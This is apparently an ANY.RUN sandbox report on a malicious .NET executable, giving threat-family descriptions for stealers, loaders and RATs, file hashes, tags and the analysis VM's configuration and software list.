Malware analysis 4363463463464363463463463.bin Malicious activity

Add for printing

File name:	4363463463464363463463463.bin
Full analysis:	https://app.any.run/tasks/defe9964-a3af-47a4-85e4-4a3e3b6da239
Verdict:	Malicious activity
Threats:	Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. The Arechclient2 malware is a sophisticated .NET-based Remote Access Trojan (RAT) that collects sensitive information, such as browser credentials, from infected computers. It employs various stealth techniques, including Base64 encoding to obscure its code and the ability to pause activities to evade automated security tools. The malware also can adjust Windows Defender settings and uses code injection to manipulate legitimate processes. Arkei is a stealer type malware capable of collecting passwords, autosaved forms, cryptocurrency wallet credentials, and files. AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. GuLoader ist ein fortschrittlicher, in Shellcode geschriebener Downloader. Er wird von Kriminellen verwendet, um andere Malware, vor allem Trojaner, in großem Umfang zu verbreiten. Er ist dafür berüchtigt, dass er Anti-Erkennungs- und Anti-Analyse-Funktionen nutzt. HijackLoader is a modular malware acting as a vehicle for distributing different types of malicious software on compromised systems. It gained prominence during the summer of 2023 and has since been used in multiple attacks against organizations from various sectors, including hospitality businesses. A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. Mars Stealer is a malware program designed to steal sensitive information from infected systems. It can access browser credentials, cryptocurrency wallets, and system information. The malware utilizes advanced evasion techniques and transmits stolen data securely through a C&C server. MetaStealer is an info-stealing malware primarily targeting sensitive data like login credentials, payment details, and browser history. It typically infects systems via phishing emails or malicious downloads and can exfiltrate data to a command and control (C2) server. MetaStealer is known for its stealthy techniques, including evasion and persistence mechanisms, which make it difficult to detect. This malware has been actively used in various cyberattacks, particularly for financial theft and credential harvesting from individuals and organizations. Phorpiex is a malicious software that has been a significant threat in the cybersecurity landscape since 2016. It is a modular malware known for its ability to maintain an extensive botnet. Unlike other botnets, Phorpiex does not concentrate on DDoS attacks. Instead, it has been involved in numerous large-scale spam email campaigns and the distribution of other malicious payloads, such as LockBit. Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely. Ramnit is a highly modular banking trojan and worm that evolved from a file-infecting virus into a powerful cybercrime tool. It specializes in financial fraud, credential theft, remote access, and malware delivery, being a serious threat to businesses and individuals. First spotted in 2010, Ramnit became popular after the 2014 takedown of the GameOver Zeus botnet, as cybercriminals sought alternatives for banking fraud. RedLine Stealer is a malicious program that collects users’ confidential data from browsers, systems, and installed software. It also infects operating systems with other malware. Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes. RisePro, an information-stealing malware, targets a wide range of sensitive data, including credit cards, passwords, and cryptocurrency wallets. By compromising infected devices, RisePro can steal valuable information and potentially cause significant financial and personal losses for victims. Socks5systemz is a botnet that utilizes its infection capabilities to establish a network of compromised devices. These devices are then used to forward malicious traffic. The criminals behind this malware sell access to the infected endpoints to other threat actors. Socks5systemz maintains control over thousands of devices and communicates with them using specific commands. Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests. Stealc ist eine Stealer-Malware, die es auf die sensiblen Daten der Opfer abgesehen hat, die sie aus Browsern, Messaging-Apps und anderer Software exfiltriert. Die Malware ist mit fortschrittlichen Funktionen ausgestattet, darunter Fingerprinting, Bedienfeld, Umgehungsmechanismen, String-Verschleierung usw. Stealc stellt eine Persistenz her und kommuniziert mit seinem C2-Server über HTTP-POST-Anfragen. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Vidar is a dangerous malware that steals information and cryptocurrency from infected users. It derives its name from the ancient Scandinavian god of Vengeance. This stealer has been terrorizing the internet since 2018. XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. XWorm ist ein Remote Access Trojaner (RAT), der als Malware-as-a-Service verkauft wird. Er verfügt über ein umfangreiches Hacking-Toolset und ist in der Lage, private Informationen und Dateien auf dem infizierten Computer zu sammeln, MetaMask- und Telegram-Konten zu kapern und Benutzeraktivitäten zu verfolgen. XWorm wird in der Regel durch mehrstufige Angriffe auf die Computer der Opfer übertragen, die mit Phishing-E-Mails beginnen. Malware Trends Tracker >>>
Analysis date:	January 11, 2024, 17:50:25
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	hausbomber loader marsstealer stealer opendir phorpiex trojan evasion redline guloader kelihos arkei rhadamanthys amadey lumma metastealer stealc azorult socks5systemz proxy risepro shellcode purplefox backdoor ramnit xworm remote vodkagats vidar quasar arechclient2 keylogger hijackloader
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:	2A94F3960C58C6E70826495F76D00B85
SHA1:	E2A1A5641295F5EBF01A37AC1C170AC0814BB71A
SHA256:	2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE
SSDEEP:	192:2we8sGKE6MqyG7c20L7BIW12n/ePSmzkTInu8stYcFwVc03KY:9e8sGKfMqyGg20PKn/cRaInuptYcFwVY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.19596 KB4534251
Adobe Acrobat Reader DC (20.013.20064)
Adobe Acrobat Reader DC (20.013.20064)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Refresh Manager (1.8.0)
Adobe Refresh Manager (1.8.0)
CCleaner (6.14)
CCleaner (6.14)
FileZilla 3.65.0 (3.65.0)
FileZilla 3.65.0 (3.65.0)
Google Chrome (109.0.5414.120)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.36.31)
Google Update Helper (1.3.36.31)
Java 8 Update 271 (8.0.2710.9)
Java 8 Update 271 (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Java Auto Updater (2.8.271.9)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.175.29)
Microsoft Edge Update (1.3.175.29)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
